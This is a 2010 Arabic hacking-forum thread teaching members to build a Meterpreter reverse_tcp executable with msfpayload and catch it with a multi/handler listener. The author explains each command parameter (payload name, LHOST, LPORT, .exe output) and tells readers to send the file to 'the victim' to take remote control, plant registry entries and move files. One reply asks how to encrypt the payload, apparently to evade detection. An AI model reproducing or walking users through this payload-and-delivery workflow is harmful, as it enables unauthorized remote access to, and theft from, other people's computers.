 |
 |
 |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
 |
 |
 |
||||||||
|
||||||||||
 |
 |
 |
||||||||
| [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] كل ما يتعلق بالميتاسبلوات و الاختراق المتقدم ..بفر افر فلو ..الخ |
 |
|
|
أدوات الموضوع | انواع عرض الموضوع |
19/03/2010, 12:25
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
|
بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاتة مدري طولت عليم بالدرس السادس لكن ظروف وامتحانات ... الله بعين .... الحمد لله وشكر لله درسنا اليوم يكون عن صناعة بايلود اسمه Meterpreter وانا اعتبره من اقوى وافضل البايلود من بين البايلودات الاخرى والاغلب يعتبره قوية لانه قوية  ما قوي الا الله يستعمل هذا البايلود بعد صناعته بأمتداد exe او pl في التحكم بجهاز الضحية ببعض الاوامر الذي يكون الامر يحل محل امر قوي كأمر زرع ريجستري ..واو ... وامر رفع ملف لجهاز الضحية وتشغيله وسحب ملف و و و ان شاء الله بهل الاكمن يوم ادرجها لكم ... الدرس فيديو لكن شرحته كتابي وبأمكانك ايضا تحميله يعني فيديو + كتابي لأصحاب النت الضعيفة نبدأ الدرس ملاحظة: هنا سنستخدم CMd shell في الميتاسبلويت وليس msfweb يعني ليس الرابط الذي تشعه بالمتصفح 127.0.0.1:55555 اول شيء نفتحه عن طريق ابدأ >> البرامج >>> Metasploit 3 >>> الكومند شيل CMD shell نبدأ الدرس بأول امر وهو كود PHP:
هناك شروحات عن صناعة هذا ويشبه الشرح لكن هناك تطبيق دون فهم اي شيء منها يعني فيك تقول الفيديوهات عن هذه البايلود منقول لكن يختلف مقدم الفيديو .. انا وضعته لكي لا حد يتسائل الآن الشرح الفيديو لي انا مش هذا موضوعنا نبدأ بالشرح ruby : كلمة تبدأ بها في اي شيء تستخدمه عن طريق CMD shell يكون بدايته ruby هذا ما نختلف عليه سواء كنت تستخدم msfcli سوف تكتب اول كلمة وهي ruby msfpayload : تستخدم في في اسخدام بايلود نحن في هذه الحالة نستخدم صناعة بايلود وليس استخدام ثغرة .ز لو كان ثغرة كا وضعنا msfcli وجزء msf هو اساسي تضعه في البداية وبعدها النوع windows/meterpreter/reverse_tcp : وهي اسم بايلود الميتر بريتر يعني ... نيجي لآخر مقطع reverse_tcp تستخدم في الاتصال العكسي مفيد في تخطي الجدار الناري وبأمكانكم وضع bind_tcp اذا كنت متأكد من البورت مفتوح .. لكن يفضل وضع اتصال عكسي ..... مش واحد ييجي ويقول بدي اضع الاثنين .. لكي اذا لم يزبط اتصال عكسي يجرب تلقائئي اتصال مباشر ويكون امره bind_tcp+reverse_tcp خخخخ <<< خخخ هذا غلط يا اخوان اما عكسي او مباشر ... واسم البايلود موجود بلميتا عن طريق وضع امر show payloads بتحصل هذه البايلود LHOST : الكل يعرفها اذا تابع دروسي من اولها وهي لأختيار اي بي جهازك الذي تريد وصول التبليغ عليه يعني بأختصار تضع اي بي جهازك المحلي LPORT : البورت الذي تريد استخدامه في الثغرة ويلزم يكون مفتوح بالراوتر X : لصناعة البايلود بأمتداد exe اي تنفيذي وان شئت بأمكانك وضع P بدل X فيصنع البايلود بأمتداد بيرل لكن يلزم تعدل على الامتددا بوضع meter.pl > : تستخدم لتشير الى وضعه بالمسار كذا يعني يتبعها المسار "C:\"vbspiders.exe : هذا هو المسار لكن يحصر المسار بين علامتي تنصيص " وبعدها تكتب الاسم وبأمكانك وضع اي اسم تريد ولا يشترط هذا الاسم فقط الآن نضغط انتر وننتظر الصناعة ورح يتم صناعتة بالمسار C وبحجم 9.50 كيلو بايت الآن نريد نتصنت عليها بثغة تصنت بالميتا ويكون الامر هكذا كود PHP:
اول شيء ruby : شرحناه فوق msfcli : لأستخدام ثغرة << في هذه المر ثغرة وليس بايلود فنستخدم بالثغرات msfcli بعدها يتبعها اسم الثغرة التصنت وهي multi/handler هي بالحقيقة لا تعتبر بأس ثغرة وانما بأسم اداة كالنت كات لكن هذه مخصصة فقط للتصنت على ثغرات الميت فقط PAYLOAD= : وضع اسم البايلود التي نريد استخدامه يجب وضع اسم البايلود الذي نريد استخدامه حسب الذي تم صناعته من قبلك يعني الامر كما هو موضح PAYLOAD=windows/meterpreter/reverse_tcp الخلاصة انك تضع اسم البايلود الذي تريد التصنت عليه LHOST=192.168.1.1 : الاي بي الذي وضعناه في اعدادات صناعة البايلود وانت استبدله بأي بي ججهازك المحلي LPORT=9999 : البورت الذي وضعناه في اعدادات الثغرة واستبدله بالبورت الذي تريد على حسب ما تم وضعه في ثغرتك ولا تسوا حرف E لانه لن يتم عمل الثغرة الا بعد وضع هذا الحرف الآن نضغط انتر وننتظر الآن هيك تم الصناعة والتصنت يبقى ارسالة للضحية بأي طريقة تريدها ... جربه على نفسك لكي تعتاد عليه موفقين شباب الى الامام بعون الله هذا رابط الفيديو واشوفه اشمل وافضل من الكتابة لأنكم اول مرة للي يمرون عليه [] اي استفسار او شيء اناا جاهز ##### تحياتي لا للاحتكار المجهوول
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
| الأعضاء الذين قالوا شكراً لـ ViRuS_Ra3cH على المشاركة المفيدة: |
D3r K0n!G (29/11/2010)
|
|
01/04/2010, 20:46
|
المشاركة رقم: 2 | ||||||||||||
|
مشكور بارك الله فيك |
||||||||||||
|
|
|
||||||||||||
|
12/04/2010, 19:16
|
المشاركة رقم: 3 | ||||||||||||
|
يعطيك الصحة خونا |
||||||||||||
|
|
|
||||||||||||
|
15/05/2010, 07:13
|
المشاركة رقم: 4 | ||||||||||||
|
merciiiiiiiiiiiiiiiiiiiiiii |
||||||||||||
|
|
|
||||||||||||
|
25/07/2010, 20:26
|
المشاركة رقم: 5 | ||||||||||||
|
ربنا يعطيك الف عافية اخي |
||||||||||||
|
|
|
||||||||||||
|
28/07/2010, 13:18
|
المشاركة رقم: 6 | ||||||||||||
|
**** لك اخي رعش |
||||||||||||
|
|
|
||||||||||||
|
29/09/2010, 13:19
|
المشاركة رقم: 7 | ||||||||||||
|
إنت أستااااز ... بارك الله فيك |
||||||||||||
|
|
|
||||||||||||
|
21/02/2012, 21:28
|
المشاركة رقم: 8 | ||||||||||||
|
إنت أستااااز ... بارك الله فيك
|
||||||||||||
|
|
|
||||||||||||
|
30/06/2013, 23:55
|
المشاركة رقم: 9 | ||||||||||||
|
سبحان الله وبحمده .. سبحان الله العظيم |
||||||||||||
|
|
|
||||||||||||
|
14/07/2013, 13:24
|
المشاركة رقم: 10 | ||||||||||||
|
machkour khoya |
||||||||||||
|
|
|
||||||||||||
|
16/07/2013, 11:09
|
المشاركة رقم: 11 | ||||||||||||
|
Nice dude good :d |
||||||||||||
|
|
|
||||||||||||
|
21/09/2013, 16:12
|
المشاركة رقم: 12 | ||||||||||||
|
وا صل جديدك |
||||||||||||
|
|
|
||||||||||||
|
22/09/2013, 12:24
|
المشاركة رقم: 13 | ||||||||||||
|
طيب كيف نشفره |
||||||||||||
|
|
|
||||||||||||
|
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| أمازون تدخل مجال صناعة الأفلام | ADMINISTRATOR | [ منتدى اخبــــار الشبكـــة] | 0 | 19/11/2010 13:58 |
 |
 |
 |
صناعة بايلود Meterpreter
العرض العادي
